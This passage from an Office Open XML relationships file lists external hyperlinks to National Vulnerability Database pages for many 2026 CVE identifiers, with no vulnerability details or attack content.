Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33391" TargetMode="External" Id="rId1454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47680" TargetMode="External" Id="rId1455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70575" TargetMode="External" Id="rId1456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77132" TargetMode="External" Id="rId1457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78446" TargetMode="External" Id="rId1458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78631" TargetMode="External" Id="rId1459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81380" TargetMode="External" Id="rId1460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86080" TargetMode="External" Id="rId1461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86714" TargetMode="External" Id="rId1462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86719" TargetMode="External" Id="rId1463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86737" TargetMode="External" Id="rId1464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11891" TargetMode="External" Id="rId1465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12387" TargetMode="External" Id="rId1466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33387" TargetMode="External" Id="rId1467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33920" TargetMode="External" Id="rId1468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73317" TargetMode="External" Id="rId1469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73318" TargetMode="External" Id="rId1470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73319" TargetMode="External" Id="rId1471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73320" TargetMode="External" Id="rId1472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84386" TargetMode="External" Id="rId1473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86516" TargetMode="External" Id="rId1474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72976" TargetMode="External" Id="rId1475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78635" TargetMode="External" Id="rId1476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79904" TargetMode="External" Id="rId1477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86735" TargetMode="External" Id="rId1478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-22575" TargetMode="External" Id="rId1479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68785" TargetMode="External" Id="rId1480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78624" TargetMode="External" Id="rId1481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86085" TargetMode="External" Id="rId1482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86993" TargetMode="External" Id="rId1483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69474" TargetMode="External" Id="rId1484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69615" TargetMode="External" Id="rId1485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78560" TargetMode="External" Id="rId1486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68849" TargetMode="External" Id="rId1487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68891" TargetMode="External" Id="rId1488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69316" TargetMode="External" Id="rId1489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69425" TargetMode="External" Id="rId1490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69483" TargetMode="External" Id="rId1491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69771" TargetMode="External" Id="rId1492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69792" TargetMode="External" Id="rId1493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69832" TargetMode="External" Id="rId1494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69853" TargetMode="External" Id="rId1495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69895" TargetMode="External" Id="rId1496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72931" TargetMode="External" Id="rId1497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69381" TargetMode="External" Id="rId1498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69548" TargetMode="External" Id="rId1499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76959" TargetMode="External" Id="rId1500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78452" TargetMode="External" Id="rId1501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78508" TargetMode="External" Id="rId1502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78971" TargetMode="External" Id="rId1503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0001" TargetMode="External" Id="rId1504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69713" TargetMode="External" Id="rId1505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28627" TargetMode="External" Id="rId1506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45527" TargetMode="External" Id="rId1507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53638" TargetMode="External" Id="rId1508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73019" TargetMode="External" Id="rId1509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76962" TargetMode="External" Id="rId1510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76963" TargetMode="External" Id="rId1511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76977" TargetMode="External" Id="rId1512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78455" TargetMode="External" Id="rId1513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78516" TargetMode="External" Id="rId1514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79588" TargetMode="External" Id="rId1515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79603" TargetMode="External" Id="rId1516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86736" TargetMode="External" Id="rId1517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86853" TargetMode="External" Id="rId1518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86994" TargetMode="External" Id="rId1519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86995" TargetMode="External" Id="rId1520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12285" TargetMode="External" Id="rId1521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80159" TargetMode="External" Id="rId1522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49895" TargetMode="External" Id="rId1523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69904" TargetMode="External" Id="rId1524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75726" TargetMode="External" Id="rId1525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76960" TargetMode="External" Id="rId1526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76961" TargetMode="External" Id="rId1527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0054" TargetMode="External" Id="rId1528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28582" TargetMode="External" Id="rId1529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28622" TargetMode="External" Id="rId1530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28623" TargetMode="External" Id="rId1531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28630" TargetMode="External" Id="rId1532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28638" TargetMode="External" Id="rId1533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28660" TargetMode="External" Id="rId1534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28671" TargetMode="External" Id="rId1535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45519" TargetMode="External" Id="rId1536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45521" TargetMode="External" Id="rId1537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45525" TargetMode="External" Id="rId1538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55290" TargetMode="External" Id="rId1539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86564" TargetMode="External" Id="rId1540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28652" TargetMode="External" Id="rId1541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48707" TargetMode="External" Id="rId1542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84389" TargetMode="External" Id="rId1543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86670" TargetMode="External" Id="rId1544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84392" TargetMode="External" Id="rId1545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82060" TargetMode="External" Id="rId1546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82710" TargetMode="External" Id="rId1547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58234" TargetMode="External" Id="rId1548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86512" TargetMode="External" Id="rId1549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86514" TargetMode="External" Id="rId1550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86515" TargetMode="External" Id="rId1551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86517" TargetMode="External" Id="rId1552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86518" TargetMode="External" Id="rId1553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86668" TargetMode="External" Id="rId1554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86674" TargetMode="External" Id="rId1555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86675" TargetMode="External" Id="rId1556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16003" TargetMode="External" Id="rId1557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86644" TargetMode="External" Id="rId1558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86667" TargetMode="External" Id="rId1559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9215" TargetMode="External" Id="rId1560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9216" TargetMode="External" Id="rId1561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12259" TargetMode="External" Id="rId1562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15603" TargetMode="External" Id="rId1563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45219" TargetMode="External" Id="rId1564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45220" TargetMode="External" Id="rId1565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49153" TargetMode="External" Id="rId1566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49154" TargetMode="External" Id="rId1567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49155" TargetMode="External" Id="rId1568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49156" TargetMode="External" Id="rId1569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50646" TargetMode="External" Id="rId1570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62383" TargetMode="External" Id="rId1571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62384" TargetMode="External" Id="rId1572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62385" TargetMode="External" Id="rId1573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62815" TargetMode="External" Id="rId1574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62900" TargetMode="External" Id="rId1575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63312" TargetMode="External" Id="rId1576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65915" TargetMode="External" Id="rId1577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69222" TargetMode="External" Id="rId1578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70613" TargetMode="External" Id="rId1579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70614" TargetMode="External" Id="rId1580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70626" TargetMode="External" Id="rId1581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71493" TargetMode="External" Id="rId1582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71494" TargetMode="External" Id="rId1583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72789" TargetMode="External" Id="rId1584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72790" TargetMode="External" Id="rId1585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72925" TargetMode="External" Id="rId1586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73087" TargetMode="External" Id="rId1587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73262" TargetMode="External" Id="rId1588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73294" TargetMode="External" Id="rId1589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73558" TargetMode="External" Id="rId1590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73560" TargetMode="External" Id="rId1591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75595" TargetMode="External" Id="rId1592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75596" TargetMode="External" Id="rId1593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75604" TargetMode="External" Id="rId1594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77037" TargetMode="External" Id="rId1595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77063" TargetMode="External" Id="rId1596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77078" TargetMode="External" Id="rId1597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7809" TargetMode="External" Id="rId1598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78675" TargetMode="External" Id="rId1599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78676" TargetMode="External" Id="rId1600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78677" TargetMode="External" Id="rId1601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78678" TargetMode="External" Id="rId1602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78679" TargetMode="External" Id="rId1603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78681" TargetMode="External" Id="rId1604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78682" TargetMode="External" Id="rId1605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78683" TargetMode="External" Id="rId1606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79657" TargetMode="External" Id="rId1607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79674" TargetMode="External" Id="rId1608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79676" TargetMode="External" Id="rId1609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80205" TargetMode="External" Id="rId1610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80206" TargetMode="External" Id="rId1611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81725" TargetMode="External" Id="rId1612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82333" TargetMode="External" Id="rId1613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82514" TargetMode="External" Id="rId1614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83605" TargetMode="External" Id="rId1615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83606" TargetMode="External" Id="rId1616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83607" TargetMode="External" Id="rId1617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83608" TargetMode="External" Id="rId1618" /><Relationship 